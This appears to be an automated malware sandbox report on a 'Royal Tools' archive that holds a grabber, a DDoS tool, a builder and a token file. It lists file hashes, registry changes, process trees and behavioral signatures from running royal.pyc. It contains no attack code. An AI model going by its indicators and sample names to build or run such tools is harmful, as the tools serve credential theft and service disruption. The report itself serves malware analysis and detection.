Overview
overview
7Static
static
3Royal_Tools.rar
windows7-x64
3Royal_Tools.rar
windows10-2004-x64
3Royal Tool...er.exe
windows7-x64
7Royal Tool...er.exe
windows10-2004-x64
7builder.pyc
windows7-x64
3builder.pyc
windows10-2004-x64
3Royal Tool...OS.exe
windows7-x64
7Royal Tool...OS.exe
windows10-2004-x64
7RoyalToolsDDOS.pyc
windows7-x64
3RoyalToolsDDOS.pyc
windows10-2004-x64
3Royal Tool...ns.txt
windows7-x64
1Royal Tool...ns.txt
windows10-2004-x64
1Royal Tools/royal.exe
windows7-x64
7Royal Tools/royal.exe
windows10-2004-x64
7royal.pyc
windows7-x64
3royal.pyc
windows10-2004-x64
3Royal Tools/royal.log
windows7-x64
1Royal Tools/royal.log
windows10-2004-x64
1Analysis
-
max time kernel
1562s -
max time network
1563s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system -
submitted
19-06-2024 00:46
Behavioral task
behavioral1
Sample
Royal_Tools.rar
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
Royal_Tools.rar
Resource
win10v2004-20240611-en
Behavioral task
behavioral3
Sample
Royal Tools/Royal Grabber.exe
Resource
win7-20231129-en
Behavioral task
behavioral4
Sample
Royal Tools/Royal Grabber.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral5
Sample
builder.pyc
Resource
win7-20240419-en
Behavioral task
behavioral6
Sample
builder.pyc
Resource
win10v2004-20240508-en
Behavioral task
behavioral7
Sample
Royal Tools/RoyalToolsDDOS.exe
Resource
win7-20240611-en
Behavioral task
behavioral8
Sample
Royal Tools/RoyalToolsDDOS.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral9
Sample
RoyalToolsDDOS.pyc
Resource
win7-20240220-en
Behavioral task
behavioral10
Sample
RoyalToolsDDOS.pyc
Resource
win10v2004-20240508-en
Behavioral task
behavioral11
Sample
Royal Tools/gennedTokens.txt
Resource
win7-20240508-en
Behavioral task
behavioral12
Sample
Royal Tools/gennedTokens.txt
Resource
win10v2004-20240611-en
Behavioral task
behavioral13
Sample
Royal Tools/royal.exe
Resource
win7-20240611-en
Behavioral task
behavioral14
Sample
Royal Tools/royal.exe
Resource
win10v2004-20240611-en
Behavioral task
behavioral15
Sample
royal.pyc
Resource
win7-20240611-en
Behavioral task
behavioral16
Sample
royal.pyc
Resource
win10v2004-20240611-en
Behavioral task
behavioral17
Sample
Royal Tools/royal.log
Resource
win7-20240508-en
Behavioral task
behavioral18
Sample
Royal Tools/royal.log
Resource
win10v2004-20240508-en
General
-
Target
royal.pyc
-
Size
141KB
-
MD5
fb0817bc4cb8ba07d7e316190adbffb9
-
SHA1
5547a663d2aae52f03f364b959bae1f38bf97bc8
-
SHA256
d7aa2af55a675d429d350e65151f487e847983cd495f962cc857731173e3d25e
-
SHA512
99288aa848c739036f94ee5d59d31e71b7493bb485c00c26df3831eb5845c9f58fbb326c11cac94bc5a9f8e040f0a296f9681c6dbf2820225fffc548416f79a3
-
SSDEEP
1536:pcNTfRgwpcEOgGMhYlWDF8VVe2mWJUvRXjXDlLiu4lSESA8obNj8M/JLpNVP:iLpcEONkQOFmVeUq1Ziu4lSEaobN/1
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 9 IoCs
Processes:
rundll32.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\.pyc\ = "pyc_auto_file" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\pyc_auto_file\shell\Read rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\pyc_auto_file\shell rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\pyc_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\pyc_auto_file rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\pyc_auto_file\ rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\.pyc rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_CLASSES\pyc_auto_file\shell\Read\command rundll32.exe Key created \REGISTRY\USER\S-1-5-21-1340930862-1405011213-2821322012-1000_Classes\Local Settings rundll32.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
AcroRd32.exepid process 2624 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
AcroRd32.exepid process 2624 AcroRd32.exe 2624 AcroRd32.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
cmd.exerundll32.exedescription pid process target process PID 2560 wrote to memory of 2980 2560 cmd.exe rundll32.exe PID 2560 wrote to memory of 2980 2560 cmd.exe rundll32.exe PID 2560 wrote to memory of 2980 2560 cmd.exe rundll32.exe PID 2980 wrote to memory of 2624 2980 rundll32.exe AcroRd32.exe PID 2980 wrote to memory of 2624 2980 rundll32.exe AcroRd32.exe PID 2980 wrote to memory of 2624 2980 rundll32.exe AcroRd32.exe PID 2980 wrote to memory of 2624 2980 rundll32.exe AcroRd32.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\royal.pyc1⤵
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\royal.pyc2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\royal.pyc"3⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2624
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5971b9ba8846b3a0491ba2092c6b0f744
SHA11c33436ad5da872a02c960fea7a8ac3eb8c5e488
SHA25678d73534da0c7d199b1284be50b92892b8237a68d452dc32d896abf39ab33935
SHA5128221dcae1041d03a576d5e5894f59b46f0d58a621ea007ca4a780ef732522a742a5cc853cf65ca8cb586750cca3a5fc924a7d1c5fbd6a48b1768da9e6e0a0554